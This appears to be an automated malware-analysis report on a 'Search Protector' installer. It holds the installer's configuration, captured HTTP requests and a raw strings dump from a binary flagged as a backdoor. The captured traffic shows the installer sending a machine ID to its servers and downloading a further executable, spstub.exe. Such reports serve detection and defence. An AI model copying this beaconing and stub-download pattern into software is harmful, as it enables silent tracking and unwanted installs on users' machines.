Content-Disposition: attachment; filename="1.txt"
[Installer]
ProductName="Setup"
ProductVersion="1.0"
ProductCode="571c756e-656d-49bc-97e6-a0b536b2c4a3"
PublisherID="388"
SourceID="0"
PageID="0"
AffiliateID="1_exe"
InstallerID="932447404"
Locale="<Language>"
Date="2014/08/02"
Time="7:19:22"
ShowInTaskbar="1"
HideScreens="0"
RunOnce="1"
LogUrl=""
LogStarted=""
LogFinished=""
LogBeforeSendReport=""
LogAfterSendReport=""

[Server]
ID="3"
Location="DE"

[UserInfo]
CountryCode="US"
IPAddress="184.107.38.38"
WebBrowser="4"

[RndGen]
Percentage="63"

[Screen76]
Title="Setup"
Button1="Try Again"
Button2="Cancel"
Label1="We're sorry: the download link seems to be broken. Please visit the author's homepage for further information."
[Screen75]
Title="Setup"
Button1="Yes"
Button2="No"
Label1="Are you sure?"
[Selec<<< skipped >>>
GET /get/?data=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&version=4 HTTP/1.1
Accept: */*
User-Agent: win32
Host: datadownloadscan.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 02 Aug 2014 07:21:34 GMT
Content-Length: 0
Connection: close
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-installer.databssint.com
Content-Length: 429
Connection: Keep-Alive
Cache-Control: no-cache
{"event_type":"MiniStub_Init", "installation_session_id":"M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8","environment":"", "command_line":"-carrier_type=ctid -carrier_id=CT3309297 -platform=all -local=en-us -startpage=true -defaultsearch=true", "EXT_ISID":"false", "carrier_ID":"CT3309297", "machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG", "installer_version":"1.1.2.4", "origin":""}
HTTP/1.1 202 Accepted
Date: Sat, 02 Aug 2014 07:19:29 GMT
P3P: CP="NOI ADM DEV COM NAV OUR STP"
Server: Apache-Coyote/1.1
Content-Length: 0
Connection: keep-alive
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-installer.databssint.com
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache
{"event_type":"MiniStub_Complete", "installation_session_id":"M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8","environment":"", "command_line":"-carrier_type=ctid -carrier_id=CT3309297 -platform=all -local=en-us -startpage=true -defaultsearch=true", "EXT_ISID":"false", "carrier_ID":"CT3309297", "machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG", "installer_version":"1.1.2.4", "origin":"", "result":"success", "reason": "0" }
HTTP/1.1 202 Accepted
Date: Sat, 02 Aug 2014 07:20:03 GMT
P3P: CP="NOI ADM DEV COM NAV OUR STP"
Server: Apache-Coyote/1.1
Content-Length: 0
Connection: keep-alive
GET /stub/spstub.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-storage.spccinta.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Sat, 02 Aug 2014 10:01:12 GMT
Accept-Ranges: bytes
ETag: "8089503af264c1568a46208aea546eff"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 175208
Date: Sat, 02 Aug 2014 07:19:29 GMT
Connection: keep-alive
<<< skipped >>>
The Backdoor connects to the servers at the following location(s):
.text
`.rdata
@.data
.rsrc
@.reloc
.EKSWU
\$$;\$0|
DlSHA512 block transform for x86, CRYPTOGAMS by
Camellia for x86 by
AES for Intel AES-NI, CRYPTOGAMS by
6-9'6-9'
$6.:$6.:
*?#1*?#1
>8$4,8$4,
AES for x86, CRYPTOGAMS by
RC4 for x86, CRYPTOGAMS by
Montgomery Multiplication for x86, CRYPTOGAMS by
SHA1 block transform for x86, CRYPTOGAMS by
SHA256 block transform for x86, CRYPTOGAMS by
GHASH for x86, CRYPTOGAMS by
GF(2^m) Multiplication for x86, CRYPTOGAMS by
FtPS
[email protected]
t.JuG
PSSSSSSh
t.VVW
<1%u5
FTPj
tCPQ
,4,56,789
j.Yf;
_tcPVj@
.PjRW
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
boost thread: trying joining itself
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagVisual C CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
kernel32.dll
left-curly-bracket
right-curly-bracket
RSA part of OpenSSL 1.0.1e 11 Feb 2013
SHA-512 part of OpenSSL 1.0.1e 11 Feb 2013
ssl_sess_cert
ssl_cert
evp_pkey
x509_pkey
%s(%d): OpenSSL internal error, assertion failed: %s
passed a null parameter
DSO support routines
x509 certificate routines
?456789:;<=
!"#$%&'()* ,-./0123
Big Number part of OpenSSL 1.0.1e 11 Feb 2013
pubkey
PEM part of OpenSSL 1.0.1e 11 Feb 2013
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
d.other
NETSCAPE_CERT_SEQUENCE
certs
X509_PUBKEY
public_key
.\crypto\asn1\x_pubkey.c
DSA part of OpenSSL 1.0.1e 11 Feb 2013
priv_key
pub_key
.\crypto\ec\ec_key.c
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
Any Extended Key Usage
anyExtendedKeyUsage
supportedAlgorithms
crossCertificatePair
certificateRevocationList
cACertificate
userCertificate
userPassword
supportedApplicationContext
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
%'%1%=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
RAND part of OpenSSL 1.0.1e 11 Feb 2013
You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html
lhash part of OpenSSL 1.0.1e 11 Feb 2013
Stack part of OpenSSL 1.0.1e 11 Feb 2013
Diffie-Hellman part of OpenSSL 1.0.1e 11 Feb 2013
value.single
value.set
EVP part of OpenSSL 1.0.1e 11 Feb 2013
name.relativename
name.fullname
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
%*s%s:
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
ASN.1 part of OpenSSL 1.0.1e 11 Feb 2013
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
AUTHORITY_KEYID
keyid
cert_info
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
EC part of OpenSSL 1.0.1e 11 Feb 2013
USER32.DLL
NETAPI32.DLL
KERNEL32.DLL
ADVAPI32.DLL
.\crypto\dh\dh_key.c
%s: (%d bit)
Public-Key
Private-Key
recommended-private-length: %d bits
public-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
Public-Key: (%d bit)
Private-Key: (%d bit)
SHA1 part of OpenSSL 1.0.1e 11 Feb 2013
SHA-256 part of OpenSSL 1.0.1e 11 Feb 2013
RIPE-MD160 part of OpenSSL 1.0.1e 11 Feb 2013
SHA part of OpenSSL 1.0.1e 11 Feb 2013
MD5 part of OpenSSL 1.0.1e 11 Feb 2013
MD4 part of OpenSSL 1.0.1e 11 Feb 2013
AES part of OpenSSL 1.0.1e 11 Feb 2013
CAST part of OpenSSL 1.0.1e 11 Feb 2013
Blowfish part of OpenSSL 1.0.1e 11 Feb 2013
:RC2 part of OpenSSL 1.0.1e 11 Feb 2013
.pp@0
aEÐ
(#EÚ
ÚE<<0
IDEA part of OpenSSL 1.0.1e 11 Feb 2013
libdes part of OpenSSL 1.0.1e 11 Feb 2013
DES part of OpenSSL 1.0.1e 11 Feb 2013
\X
ddddddZ
ddddddZ
%d.%d.%d.%d
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:
X400Name:
othername:
%d.%d.%d.%d/%d.%d.%d.%d
X509_CERT_PAIR
X509_CERT_AUX
X.509 part of OpenSSL 1.0.1e 11 Feb 2013
x%s
%s - d:d:d%.*s %d%s
keylen <= sizeof key
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
ECDSA part of OpenSSL 1.0.1e 11 Feb 2013
Basis Type: %s
Field Type: %s
ASN1 OID: %s
%s %s%lu (%s0x%lx)
'() ,-./:=?
Verifying - %s
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
.\crypto\x509v3\v3_akey.c
d.usernotice
d.cpsuri
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
%*sCPS: %s
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
CONF part of OpenSSL 1.0.1e 11 Feb 2013
PROXY_CERT_INFO_EXTENSION
hexkey
rsa_keygen_pubexp
rsa_keygen_bits
keylength
keyfunc
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
.\crypto\pkcs12\p12_key.c
d.receiptList
d.allOrFirstTier
d.compressedData
d.authenticatedData
d.encryptedData
d.digestedData
d.envelopedData
d.signedData
d.ori
d.pwri
d.kekri
d.kari
d.ktri
CMS_PasswordRecipientInfo
keyDerivationAlgorithm
keyIdentifier
CMS_KeyAgreeRecipientInfo
recipientEncryptedKeys
CMS_OriginatorIdentifierOrKey
d.originatorKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
d.rKeyId
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
keyAttr
keyAttrId
CMS_KeyTransRecipientInfo
encryptedKey
keyEncryptionAlgorithm
certificates
d.crl
d.subjectKeyIdentifier
d.issuerAndSerialNumber
CMS_CertificateChoices
d.v2AttrCert
d.v1AttrCert
d.extendedCertificate
d.certificate
CMS_OtherCertificateFormat
otherCert
otherCertFormat
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
CONF_def part of OpenSSL 1.0.1e 11 Feb 2013
[[%s]]
[%s] %s=%s
ECDH part of OpenSSL 1.0.1e 11 Feb 2013
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
%s.dll
@7@!@)@4@
@4@!@ @%@/@6@%@2@
@%@6@%@.@4@
A%@%C%D%P%I%Q%v%@%D%W%F%M%
S6S%S6S!S'S6S7S
8U4U-UuU4U!U!U0U8U%U!U&UuU'U0U4U6U=U0U1U
(\=\7\9\3\*\9\.\
C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\3rdParty\Boost\boost_1_55_0\boost/exception/detail/exception_ptr.hpp
{{{$1044}}}{{{$1047}}}{{{$1048}}}{{{$626}}}{{{$1049}}}[>[)[-[2[8[>[{[]8]/] ]4]>]8]}]
S6S!S%S6S!S
{{{$1055}}}{{{$1058}}}{{{$1057}}}{{{$1060}}}{{{$1059}}}{{{$1062}}}{{{$1061}}}{{{$1064}}}{{{$1063}}}{{{$1066}}}{{{$1065}}}{{{$1068}}}{{{$1067}}}{{{$1070}}}{{{$1069}}}{{{$1072}}}{{{$1071}}}{{{$1073}}}{{{$1101}}}{{{$1102}}}{{{$1104}}}{{{$1103}}}{{{$1106}}}{{{$1105}}}{{{$1108}}}{{{$1107}}}{{{$1109}}}{{{$1111}}}{{{$1110}}}{{{$1113}}}{{{$1112}}}{{{$1116}}}{{{$1117}}}{{{$1114}}}{{{$1115}}}{{{$1123}}}{{{$1122}}}{{{$1125}}}{{{$1124}}}{{{$1126}}}{{{$1127}}}{{{$1129}}}{{{$1128}}}{{{$1130}}}{{{$1131}}}{{{$1132}}}{{{$139}}}{{{$138}}}{{{$141}}}{{{$140}}}{{{$142}}}{{{$144}}}{{{$143}}}{{{$146}}}{{{$145}}}{{{$124}}}{{{$127}}}{{{$128}}}{{{$125}}}{{{$126}}}{{{$131}}}{{{$132}}}{{{$129}}}{{{$130}}}{{{$133}}}{{{$134}}}{{{$135}}}J%V%I%J%F%D%I%@%
{{{$471}}}{{{$473}}}{{{$468}}}{{{$461}}}c%W%J%H%l%K%V%Q%D%I%I%
D%D/D!D D2D!D6D
DÐD%D
_6_<_-_0_,_0_9_ _
_6_1_;_0_(_,_
_*_-_-_:_1_ _
_:_-_,_6_0_1_
_2_>_8_:_
_'_:_<_*_ _6_0_1_
_/_ _6_0_1_,_
I,I$I9I,I;I I'I.IiIdIiI
{{{$483}}}{{{$484}}}{{{$486}}}{{{$487}}}{{{$485}}}{{{$488}}}{{{$489}}}{{{$494}}}{{{$495}}}{{{$498}}}{{{$496}}}{{{$497}}}{{{$499}}}{{{$501}}}{{{$502}}}{{{$500}}}{{{$503}}}{{{$504}}}{{{$505}}}{{{$508}}}{{{$506}}}{{{$507}}}{{{$509}}}{{{$510}}}{{{$511}}}{{{$512}}}{{{$513}}}{{{$514}}}{{{$515}}}{{{$518}}}{{{$519}}}{{{$516}}}{{{$517}}}{{{$520}}}{{{$521}}}{{{$523}}}{{{$522}}}4|7|?|?|
{{{$609}}}{{{$610}}}{{{$613}}}{{{$614}}}{{{$611}}}{{{$612}}}_3_0_=_>_3_
_(_6_1_;_0_(_,_
_8_3_0_=_>_3_
_<_0_*_1_ _:_-_,_
S6S!S>S S.SuS
cCc%c
{{{$404}}}{{{$402}}}{{{$403}}}{{{$405}}}Z.Z#Z*Z?ZgZ}Z.Z?Z"Z.ZuZ2Z.Z7Z6Z}Z
{{{$406}}}[([>[:[)[8[3[
[>[)[6[&[
{{{$408}}}{{{$409}}}{{{$410}}}F5F#F'F4F%F.F6F*F3F!F/F(F5F
B0B.BbB6B;B2B'B
PUADQ@%%h`qdv%V@Q%vu`flclfv8:4)%v`ws`wZvu`flclfv8:7%RM@W@%kjkZpkltp`Zkdh`%iln`%"mjh`udb`ZlvZk`rqdgudb`"%DKA%v`ws`wZkjkZpkltp`Zkdh`%%iln`%"mjh`udb`ZlvZk`rqdgudb`"
{{{$312}}}{{{$313}}}{{{$314}}}{{{$334}}}a!-dc}xyRhcnbidcj~!-~xjjh~yRx
U&U!U4U'U!U U%U
{{{$357}}}{{{$358}}}{{{$359}}}{{{$360}}}CREATE TABLE ItemTable (key TEXT UNIQUE ON CONFLICT REPLACE, value TEXT NOT NULL ON CONFLICT FAIL);
insert into ItemTable (key, value) VALUES ('%s', '%s');1d'd)d;d7d!dÖd'd,d;d0d!d6d)d
\/\/\9\(\
{{{$629}}}{{{$632}}}{{{$631}}}{{{$630}}}C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\3rdParty\google\gtest\gtest-1.6.0\include\gtest/internal/gtest-port.h
(more frames truncated from call stack report)
\StringFileInfo\xx\%s
Module %d
%d/%d/%d d:d:d
File Size: %-10d File Time: %s
Checksum: 0xx Time Stamp: 0xx
Image Base: 0xx Image Size: 0xx
FileVer: %d.%d.%d.%d
FileDesc: %s
Product: %s
Company: %s
ProdVer: %d.%d.%d.%d
Windows 7
Windows Server 2008
Windows Vista
Windows 9
Windows Server 2012
Windows 8
Windows Server 2008 R2
Web Edition
Windows XP
Windows Server 9
Windows 2000
(build %d)
Error occurred at %s.
This sample does not support this version of Windows.
%d%% memory in use.
%d processor(s), type %d.
Operating system: Could not Determine
Operating system: %s
%d MBytes paging file free.
%d MBytes paging file.
%d MBytes physical memory free.
%d MBytes user address space free.
Windows Home Server
Windows Storage Server 2003
Windows Server 2003 R2
Web Server Edition
Windows Server 2003
Windows XP Professional x64 Edition
a Float Denormal Operand
%d MBytes user address space.
a Float Invalid Operation
%d MBytes physical memory.
0xx:
EBX: 0xx ECX: 0xx EDX: 0xx
EDI: 0xx ESI: 0xx EAX: 0xx
%s\CRASH_REPORT_%s.txt
EFlags: 0xx ESP: 0xx SegSs: 0xx
EIP: 0xx EBP: 0xx SegCs: 0xx
%s caused %s (0xx)
in module %s at x:x.
%s location x caused an access violation.
Exception code is 0xX
Crash dump file: %s
Crash report file :%s
%s\CRASH_DUMP_%s.dmp
===== [end of %s] =====
Error creating dump file, err=%d
P%d_T%d_Dld_ld_ld_Tld_ld_ld
code: %x
code: %x, addr: %x, module: %s
00:00:00.
NtQueryKey
{{{$615}}}{{{$618}}}{{{$617}}}{{{$616}}}{{{$624}}}{{{$623}}}{{{$691}}}{{{$690}}}{{{$693}}}{{{$692}}}%s 0x%I64x %s [file:%s(%u)]
ftp://
https://
http://
wininet.dll
[%u, 0xx] %s
https
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
request HttpSendRequestA failed...
Content-Length: %u
response failed...last error %d
1.1.3
gen_codes: max_code %d
code %d bits %d->%d
bl code -
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
{{{$717}}}{{{$718}}}{{{$719}}}{{{$720}}}{{{$723}}}{{{$722}}}{{{$721}}}{{{$724}}}{{{$725}}}{{{$728}}}{{{$727}}}{{{$726}}}{{{$729}}}{{{$730}}}{{{$731}}}{{{$733}}}{{{$732}}}{{{$735}}}{{{$734}}}{{{$744}}}{{{$743}}}{{{$742}}}{{{$747}}}{{{$746}}}%{{{$667}}}{{{$669}}}{{{$668}}}SQLite format 3
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
3.7.16
CREATE TEMP TABLE sqlite_temp_master(
{{{$101}}}{{{$103}}}{{{$102}}}{{{$108}}}{{{$107}}}{{{$110}}}{{{$109}}}{{{$104}}}{{{$106}}}{{{$105}}}{{{$112}}}{{{$111}}}{{{$113}}}{{{$114}}}{{{$118}}}{{{$119}}}{{{$115}}}{{{$117}}}{{{$116}}}{{{$121}}}{{{$123}}}{{{$122}}}{{{$120}}}{{{$100}}}{{{$685}}}{{{$684}}}{{{$687}}}{{{$686}}}{{{$681}}}{{{$683}}}{{{$682}}}{{{$688}}}%A%@%S%Q%W%J%S%L%B%J%
%F%J%H%
*F'F$FhF5F#F'F4F%F.FhF%F)F(F"F3F/F2FhF%F)F F
boost::too_few_args: format-string referred to more arguments than were passed
boost::too_many_args: format-string referred to less arguments than were passed
{{{$137}}}Content-Disposition: form-data; name="%s"; filename="%s"
Content-Disposition: form-data; name="%s"
_0_9_ _(_>_-_:_
_:_>_-_<_7_
_-_0_ _:_<_ _
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
API call with %s database connection pointer
922337203685477580
RowKey
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
GetProcessHeap
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
2nd reference to page %d
Failed to read ptrmap key=%d
Page %d:
unable to get the page. error code=%d
failed to get page %d
freelist leaf count too big on page %d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Corruption detected in cell %d on page %d
Page %d is never used
Pointer map page %d is referenced
unknown database %s
Outstanding page count goes from %d to %d during this analysis
keyinfo(%d
%s(%d)
MJ delete: %s
MJ collide: %s
%s-mjXXXXXX9XXz
-mjX9X
foreign key constraint failed
bind on a busy prepared statement: [%s]
unable to use function %s in the requested context
zeroblob(%d)
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
abort at %d in [%s]: %s
cannot commit transaction - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
database table is locked: %s
statement aborts at %d: [%s] %s
cannot change %s wal mode from within a transaction
cannot open value of type %s
cannot open view: %s
no such column: "%s"
cannot open virtual table: %s
cannot open %s column for writing
foreign key
indexed
misuse of aliased aggregate %s
%s: %s
not authorized to use function: %s
%s: %s.%s.%s
%s: %s.%s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
variable number must be between ?1 and ?%d
too many SQL variables
Expression tree is too large (maximum depth %d)
too many columns in %s
EXECUTE %s%s SUBQUERY %d
%.*s"%w"%s
misuse of aggregate: %s()
sqlite_rename_trigger
sqlite_rename_parent
%s%.*s"%w"
sqlite_rename_table
type='trigger' AND (%s)
%s OR name=%Q
there is already another table or index with this name: %s
view %s may not be altered
sqlite_
table %s may not be altered
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_stat1
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
database %s is already in use
invalid name: "%s"
too many attached databases - max %d
unable to open database: %s
no such database: %s
database %s is locked
sqlite_detach
cannot detach database %s
access to %s.%s.%s is prohibited
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s is prohibited
object name reserved for internal use: %s
too many columns on %s
duplicate column name: %s
there is already an index named %s
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
default value of column [%s] is not constant
table "%s" has more than one primary key
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
view %s is circularly defined
CREATE TABLE %Q.sqlite_sequence(name,seq)
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
sqlite_stat
table %s may not be dropped
unknown column "%s" in foreign key definition
indexed columns are not unique
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
table %s may not be indexed
views may not be indexed
index %s already exists
sqlite_autoindex_%s_%d
virtual tables may not be indexed
there is already a table named %s
table %s has no column named %s
no such index: %S
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
no such collation sequence: %s
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_compileoption_get
sqlite_log
sqlite_compileoption_used
foreign key mismatch - "%w" referencing "%w"
%d values for %d columns
table %S has no column named %s
table %S has %d columns but %d values were supplied
constraint %s failed
PRIMARY KEY must be unique
%s.%s may not be NULL
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
sqlite3_extension_init
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
foreign_key_check
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
%s - %s
database schema is locked: %s
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
unknown or unsupported join type: %T %T%s%T
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
%s.%s
%s:%d
COMPOUND SUBQUERIES %d AND %d %s(%s)
SELECTs to the left and right of %s do not have the same number of result columns
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
too many references to "%s": max 65535
%s.%s.%s
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
no such trigger: %S
-- TRIGGER %s
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')no such column: %s
PRAGMA vacuum_db.synchronous=OFF
cannot VACUUM - SQL statements in progress
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
vtable constructor failed: %s
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
no such module: %s
vtable constructor did not declare schema: %s
table %s: xBestIndex returned an invalid plan
%s TABLE %s
%s AS %s
%s SUBQUERY %d
